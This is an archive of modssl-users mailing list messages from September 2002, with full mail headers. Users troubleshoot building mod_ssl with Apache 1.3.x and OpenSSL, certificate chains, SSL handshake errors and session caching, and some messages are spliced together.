Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  5 08:42:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA06885; Thu, 5 Sep 2002 08:41:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from picard.skynet.be id IAA06880; Thu, 5 Sep 2002 08:40:52 +0200 (MET DST)
Received: from Anakin (154.66-136-217.adsl.skynet.be [217.136.66.154])
	by picard.skynet.be (8.11.6/8.11.6/Skynet-OUT-2.20) with SMTP id g856eok28548
	for ; Thu, 5 Sep 2002 08:40:50 +0200 (MET DST)
	(envelope-from )
From: "Thierry Cabuzel" 
To: 
Subject: RE: Apache + VirtualHost + WebDAV + mod_ssl
Date: Thu, 5 Sep 2002 08:45:22 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <20020904214000.GA24537@marvin-lnx.staff.tdk.net>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Thierry Cabuzel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Message d'origine-----
> De la part de Mads Toftum
> Envoyé : mercredi 4 septembre 2002 23:40
>
> > I have downloaded
> "Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip". Is
> > it enough ?
>
> you need newer versions - apache should be 1.3.26 and openssl also needs
> to be the latest version.

I have no probem to update apache. but for mod_ssl, I have bigger problem as
the contrib page of modssl.org seems out of order and the ftp folder is a
bit messy and OpenSSL_0.9.6c seems to be the older I can find in it. Source
is not a good solution as I have no C compiler and I don't want to mess with
one (at a point that I prefer to take the risk of a backdoored mod_ssl found
via google on an unknow server than to have to compile it from source).


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  5 08:58:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA07502; Thu, 5 Sep 2002 08:57:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id IAA07180; Thu, 5 Sep 2002 08:48:31 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g856m2a25291
	for ; Thu, 5 Sep 2002 08:48:02 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Thu Sep 05 08:48:08 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 5 Sep 2002 08:47:58 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 5 Sep 2002 08:47:58 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 5 Sep 2002 08:47:57 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: No such module 'ssl'
Date: Thu, 5 Sep 2002 08:47:57 +0200
Message-ID: 
Thread-Topic: No such module 'ssl'
Thread-Index: AcJUXL2P5Y0TROpkQqe0ATGbICJrIQAS1QfA
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 05 Sep 2002 06:47:58.0058 (UTC) FILETIME=[2B7BFCA0:01C254A8]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA07499
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Alex

I think he meant you to run ./configure from the mod_ssl installation
directory and not the apache one.

Regards
Jose

-----Original Message-----
From: Alex Kirk [mailto:alex@schnarff.com]
Sent: 04 September 2002 23:48
To: modssl-users@modssl.org
Subject: Re: No such module 'ssl'


> I think you should try "--with-ssl" option.

configure:Error: invalid option '--with-ssl=src/modules/ssl/' 

No, I don't think so. Thanks for the thought though. Any other ideas
on how 
I should be doing this? 

Alex Kirk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  5 14:17:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA15654; Thu, 5 Sep 2002 14:16:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spyder id OAA15650; Thu, 5 Sep 2002 14:16:01 +0200 (MET DST)
Received: from [127.0.0.1] by spyder
  (ArGoSoft Mail Server Plus, Version 1.6 (1.6.0.0)); Thu, 5 Sep 2002 08:15:55 -0400
Message-ID: <000b01c254d5$fc0b2030$1100000a@woburn.com>
From: "Martin Dickau" 
To: 
References: 
Subject: Re: Apache + VirtualHost + WebDAV + mod_ssl
Date: Thu, 5 Sep 2002 08:15:41 -0400
Organization: ByAllAccounts
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Martin Dickau" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You should try OpenSA (http://www.opensa.org).  V1.0.3 is available, and it
has Apache 1.3.26 + mod_ssl 2.8.10 + OpenSSL 0.9.6g, built for Windows, with
a Windows installer.  The release notes/download page is here:
http://www.opensa.org/download/100.html

----- Original Message -----
From: "Thierry Cabuzel" 
To: 
Sent: Thursday, September 05, 2002 2:45 AM
Subject: RE: Apache + VirtualHost + WebDAV + mod_ssl


> I have no probem to update apache. but for mod_ssl, I have bigger problem
as
> the contrib page of modssl.org seems out of order and the ftp folder is a
> bit messy and OpenSSL_0.9.6c seems to be the older I can find in it.
Source
> is not a good solution as I have no C compiler and I don't want to mess
with
> one (at a point that I prefer to take the risk of a backdoored mod_ssl
found
> via google on an unknow server than to have to compile it from source).

The OpenSA 1.0.3 kit also includes mod_ColdFusion (4.5.x), mod_DAV 1.0.3,
PHP 4.2.2, mod_ASP, mod_GZIP, and mod_AuthMysql 2.22.

Regards,

Martin Dickau, ByAllAccounts
mdickau@byallaccounts.com



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  5 21:47:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA24558; Thu, 5 Sep 2002 21:46:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from schnarff.com id VAA24552; Thu, 5 Sep 2002 21:45:43 +0200 (MET DST)
Received: (qmail 29072 invoked by uid 1000); 5 Sep 2002 19:48:35 -0000
Message-ID: <20020905194835.5517.qmail@schnarff.com>
References: 
In-Reply-To:  
From: "Alex Kirk" 
To: modssl-users@modssl.org
Subject: Re: No such module 'ssl'
Date: Thu, 05 Sep 2002 19:48:35 GMT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Kirk" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Hi Alex 
> 
> I think he meant you to run ./configure from the mod_ssl installation
> directory and not the apache one.

Still getting problems with that: 

bash-2.04# pwd
/home/packages/mod_ssl-2.8.10-1.3.26
bash-2.04# SSL_BASE=/home/packages/openssl-0.9.6g/ ./configure 
 --with-apache=../apache_1.3.26 --with-layout=Apache 
 --with-ssl=../apache_1.3.26/src/modules/ssl/ --prefix=/usr/local/apache/ 
 --enable-module=so --activate-module=src/modules/perl/libperl.a 
 --activate-module=src/modules/php4/libphp4.a
Configuring mod_ssl/2.8.10 for Apache/1.3.26
+ Apache location: ../apache_1.3.26 (Version 1.3.26)
+ OpenSSL location: ../apache_1.3.26/src/modules/ssl/
+ Auxiliary patch tool: ./etc/patch/patch (local)
+ Applying packages to Apache source tree:
  o Extended API (EAPI)
  o Distribution Documents
  o SSL Module Source
  o SSL Support
  o SSL Configuration Additions
  o SSL Module Documentation
  o Addons
Done: source extension and patches successfully applied. 

Configuring for Apache, Version 1.3.26
+ using installation path layout: Apache (config.layout)
+ activated perl module (modules/perl/libperl.a)
+ activated php4 module (modules/php4/libphp4.a)
configure:Error: No such module named 'ssl'
./configure:Error: APACI failed 

I even checked for a libssl.a in apache_1.3.26/src/modules/ssl/; there 
wasn't one, but I found one in openssl-0.9.6g/ and copied it over. That 
didn't work, either. 

You'd really think this wouldn't be so complex... 

Alex Kirk
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  6 11:27:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA10750; Fri, 6 Sep 2002 11:26:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id LAA10741; Fri, 6 Sep 2002 11:25:05 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g866wPa20397
	for ; Fri, 6 Sep 2002 08:58:29 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Fri Sep 06 08:58:31 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 6 Sep 2002 08:58:21 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 6 Sep 2002 08:58:21 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 6 Sep 2002 08:58:20 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: No such module 'ssl'
Date: Fri, 6 Sep 2002 08:58:20 +0200
Message-ID: 
Thread-Topic: No such module 'ssl'
Thread-Index: AcJVFTwhvH3r5NucQnGLZtQxi5U6cgAXVGBQ
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 06 Sep 2002 06:58:20.0744 (UTC) FILETIME=[C90C1480:01C25572]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA10747
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Alex

Why are you using:

--with-ssl=../apache_1.3.26/src/modules/ssl/

instead of --with-ssl=../openssl_0.9.6a  (or whatever version you
have) ??

Cheers
Jose



-----Original Message-----
From: Alex Kirk [mailto:alex@schnarff.com]
Sent: 05 September 2002 21:49
To: modssl-users@modssl.org
Subject: Re: No such module 'ssl'


> Hi Alex 
> 
> I think he meant you to run ./configure from the mod_ssl
installation
> directory and not the apache one.

Still getting problems with that: 

bash-2.04# pwd
/home/packages/mod_ssl-2.8.10-1.3.26
bash-2.04# SSL_BASE=/home/packages/openssl-0.9.6g/ ./configure 
 --with-apache=../apache_1.3.26 --with-layout=Apache 
 --with-ssl=../apache_1.3.26/src/modules/ssl/
--prefix=/usr/local/apache/ 
 --enable-module=so --activate-module=src/modules/perl/libperl.a 
 --activate-module=src/modules/php4/libphp4.a
Configuring mod_ssl/2.8.10 for Apache/1.3.26
+ Apache location: ../apache_1.3.26 (Version 1.3.26)
+ OpenSSL location: ../apache_1.3.26/src/modules/ssl/
+ Auxiliary patch tool: ./etc/patch/patch (local)
+ Applying packages to Apache source tree:
  o Extended API (EAPI)
  o Distribution Documents
  o SSL Module Source
  o SSL Support
  o SSL Configuration Additions
  o SSL Module Documentation
  o Addons
Done: source extension and patches successfully applied. 

Configuring for Apache, Version 1.3.26
+ using installation path layout: Apache (config.layout)
+ activated perl module (modules/perl/libperl.a)
+ activated php4 module (modules/php4/libphp4.a)
configure:Error: No such module named 'ssl'
./configure:Error: APACI failed 

I even checked for a libssl.a in apache_1.3.26/src/modules/ssl/; there

wasn't one, but I found one in openssl-0.9.6g/ and copied it over.
That 
didn't work, either. 

You'd really think this wouldn't be so complex... 

Alex Kirk
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  6 17:27:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA19107; Fri, 6 Sep 2002 17:25:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from oaxaca.jah.net id RAA19099; Fri, 6 Sep 2002 17:24:34 +0200 (MET DST)
Received: from petong by oaxaca.jah.net with local (Exim 3.35 #1 (Debian))
	id 17nKyB-0001Bg-00
	for ; Fri, 06 Sep 2002 08:24:27 -0700
Date: Fri, 6 Sep 2002 08:24:27 -0700
From: Peter Hicks 
To: modssl-users@modssl.org
Subject: Using a different CA
Message-ID: <20020906152427.GB3498@oaxaca.jah.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
X-conspiracy: yes
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Hicks 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello List,

I have a question regarding the use of a different CA. I recently
purchased an SSL certificate from comodo.net and I have not been able
to get it to work properly. My browser responds that it cannot
recognize the issuer of the certificate. I am running apache 1.3.26,
mod-ssl 2.8.9, and openssl 0.9.6c on a debian woody system.


The global-ca.txt file has been downloaded from their site, and I have
contacted their tech support, who have provided me with no answers.

I have the following directive in my
vitual host container tags:


SSLEngine on
SSLCertificateFile    /etc/apache/ssl.crt/site.crt
SSLCertificateKeyFile /etc/apache/ssl.key/site.key
SSLCACertificateFile /etc/apache/ca-bundle/global-ca.txt
SetEnvIf User-Agent ".*MSIE.*"  nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0



Has anyone else had any experience with comodo? Should I break down
and shell out the extra $$ for a Thawte cert?

Any help would be greatly appreciated!

-- 
Peter Hicks
GnuPG public key: http://jah.net/~petong/public_key.txt
Key Fingerprint: 4E24 3C78 A165 537C 729C  8D25 3547 3CE9 9E7D 42B6
Every why hath a wherefore. -- William Shakespeare, "A Comedy of Errors"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep  7 09:17:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07914; Sat, 7 Sep 2002 09:16:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07903; Sat, 7 Sep 2002 09:15:15 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2FFF04CE61C; Sat,  7 Sep 2002 09:15:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AF6FA28683; Sat,  7 Sep 2002 08:57:35 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from viper id VAA24197; Fri, 6 Sep 2002 21:01:50 +0200 (MET DST)
Received: from aati.edu ([167.192.42.234])
 by viper (Mail-Gear 2.0.0 bld 55) with SMTP id M2002090615040500484
 for ; Fri, 06 Sep 2002 15:04:05 -0400
Message-ID: <3D7924DC.1AC8A238@aati.edu>
Date: Fri, 06 Sep 2002 14:57:48 -0700
From: Lu Penn 
Organization: Athens Technical College
X-Mailer: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Userid logging...
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lu Penn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

To the modssl-users...

We are running Linux-Apache-mod_SSL on a Web server, allowing the user
to download a secure file via Userid/Password access.  The problem is
that the Userid does not appear in the Apache log.  We must know what
users are downloading the file, and when, but we cannot determine this
information from the existing log information.

Can anyone shed some light on this problem?  Is there a fix?

Thank you so much....

Dr. Penn
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  9 10:46:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA00544; Mon, 9 Sep 2002 10:45:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA00490; Mon, 9 Sep 2002 10:44:26 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C70B94CE726; Mon,  9 Sep 2002 10:44:25 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 878FC286BB; Mon,  9 Sep 2002 10:41:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from staticky.com id EAA22503; Mon, 9 Sep 2002 04:04:00 +0200 (MET DST)
Received: (qmail 2171 invoked by uid 509); 9 Sep 2002 01:09:14 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 9 Sep 2002 01:09:14 -0000
Date: Sun, 8 Sep 2002 21:09:13 -0400 (EDT)
From: "hensleyrob@nku.edu" 
To: 
Subject: Error Code -12281
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "hensleyrob@nku.edu" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I recently tried installing mod_ssl with my apache server on a Debian
unstable system. I've got my keys and everything in place, but when I try
to access https://zoidian.com i get the following error:

zoidian.com has sent an incorrect or unexpected message: Error Code: -12281

That's from Mozilla. When I try curl https://localhost I get the following:

curl: (35) SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol

And when I try openssl s_client -connect localhost:443 -state -debug i get:

CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0809A270 [0809A2B8] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 68 bf 32 a8   ............h.2.
0060 - 08 cd 08 82 06 dc 2d 6d-9b c0 fe 4e 9b e8 4d f2   ......-m...N..M.
0070 - 5d 73 ce 40 96 25 f0 42-9f 27 64 16               ]s.@.%.B.'d.
SSL_connect:SSLv2/v3 write client hello A
read from 0809A270 [0809F818] (7 bytes => 7 (0x7))
0000 - 0a 3c 21 2d 2d 20 42                              .
Probably an old library.

Try running ldd on the httpd binary.  If that doesn't reveal anything, you
could always do:

find / -name "libssl*"
find / -name "libcrypto*"

Some possible locations:

/usr/local/ssl/lib
/usr/local/lib

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

  





-- 
.tom







--------------060909070202060400020806--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 15 17:31:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA29671; Sun, 15 Sep 2002 17:30:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id RAA29613; Sun, 15 Sep 2002 17:29:55 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8FFIhoZ000855
	for ; Sun, 15 Sep 2002 11:18:43 -0400
Date: Sun, 15 Sep 2002 11:18:01 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Upgrading to OpenSSL 0.9.6g, server still reports 0.9.6a
In-Reply-To: <3D8467DC.3010007@wideopenwest.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, 15 Sep 2002, Thomas Gagne wrote:

>       + SSL library version: OpenSSL 0.9.6g 9 Aug 2002 <<<<<<<<<<<<
>
> Did I miss something?

The version found by the script and the version linked in aren't
*necessarily* the same one.  Which is bad, I know, but for one reason or
another it's never been a perfect 1-1 match.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 02:12:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA09094; Mon, 16 Sep 2002 02:11:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from search.terespondo.com id CAA09085; Mon, 16 Sep 2002 02:11:02 +0200 (MET DST)
Received: from modernmethod.com (dsl-65-185-77-77.telocity.com [65.185.77.77])
	by search.terespondo.com (Postfix) with ESMTP id AC9D42F78A6
	for ; Sun, 15 Sep 2002 19:33:09 -0500 (CDT)
Message-ID: <3D8521BC.3060500@modernmethod.com>
Date: Sun, 15 Sep 2002 20:11:40 -0400
From: Thomas Lackner 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc3) Gecko/20020524
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [Hint: Stop button pressed...] (errno: 104)
References:  <51918.172.16.3.169.1032005801.squirrel@clear.vefpostur.skyrr.is>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Lackner 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

FYI,

I had a huge problem with this on a client's site and could only remedy 
it by *downgrading* to an old version of OpenSSL which did not have this 
problem. I tried all the other solutions I could find.

This is definitely a bug in the software.

- tom

Elías Halldór Ágústsson wrote:
> Horst sagði:
> 
>>Recently, I noticed an increase of those (errno: 104) -see bottom. A bit
>>of research on the subject only pointed me to messages that
>>discussed the issue of 'How to handle this in log files?' along the line
>>of how to ignore it.
>>
>>A) What I didn't see is any EXPLANATION about what this really MEANS ?
>> (obviously it's not a 'normal' error message which contains a client
>>IP; also those logs come in groups of several per second -- no *regular*
>>user can do it that consistently)
> 
> 
> I strongly suspect that this is due to broken MSIE with 56-bit encryption
> only. Which brings me to a problem that I can't seem to be able to solve,
> which is that I can't get mod_ssl and weak-crypto MSIE to negotiate an SSL
> session. It always hangs and if the (ill-named) "friendly HTTP error
> messages" are enabled in MSIE, it gives the error "DNS error or host not
> found".
> 
> So, what I will do is to let MSIE users be able to choose between http and
> https on a page which explains the problem and what users can do to to
> solve it. 56-bit encryption is too close to no encryption at all, anyway.
> 


-- 
tlack@modernmethod.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 10:06:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA17651; Mon, 16 Sep 2002 10:05:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from firewall.izb-soft.de id KAA17599; Mon, 16 Sep 2002 10:04:38 +0200 (MET DST)
Received: (from uucp@localhost)
	by firewall.izb-soft.de (8.8.8+Sun/8.8.8) id KAA12061
	for ; Mon, 16 Sep 2002 10:02:17 +0200 (MET DST)
Received: from unknown(172.16.10.44) by firewall.izb-soft.de via smap (V5.5)
	id xma011948; Mon, 16 Sep 02 10:01:39 +0200
Received: by IMC01 with Internet Mail Service (5.5.2448.0)
	id ; Mon, 16 Sep 2002 10:03:43 +0200
Message-ID: <25661D728E8BD3118DBA0000F6CC02D4031485C2@m9900shm.izb-soft.de>
From: "Ehrl, Martin" 
To: "'modssl-users@modssl.org'" 
Subject: apache 1.3.12 SSLSessionCache
Date: Mon, 16 Sep 2002 10:03:41 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ehrl, Martin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i have a problem with apache 1.3.12. SSL-Requests from Browsers a handled
correctly, but there are problems with requests from a Homebanking--Client
(Starmoney). The first request is ok, but any further one is being rejected.
The error log shows this:  

[notice] child pid 13278 exit signal Bus Error (10)

With the following entry in httpd.conf the problem seems to be fixed :
SSLSessionCache dbm:file

With apache 1.3.6 this entry wasn't necessary. 

Can anyone help me to understand this behaviour? 
Thanks.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 16 12:03:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA20191; Mon, 16 Sep 2002 12:02:54 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th04.opsion.fr id MAA20182; Mon, 16 Sep 2002 12:02:02 +0200 (MET DST)
Received: from 212.180.95.194 [212.180.95.194] by th04.opsion.fr id 200209161000.2fc5; Mon, 16 Sep 2002 10:00:47 GMT
Message-ID: <3D85AC3A.2000706@ifrance.com>
Date: Mon, 16 Sep 2002 12:02:34 +0200
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020809
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Cryptoswift + apache 2.0
References: <25661D728E8BD3118DBA0000F6CC02D4031485C2@m9900shm.izb-soft.de>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'am searching the best directives for apache 2.0 and Cryptoswift.
is anyone get optimized directives with which he do really good 
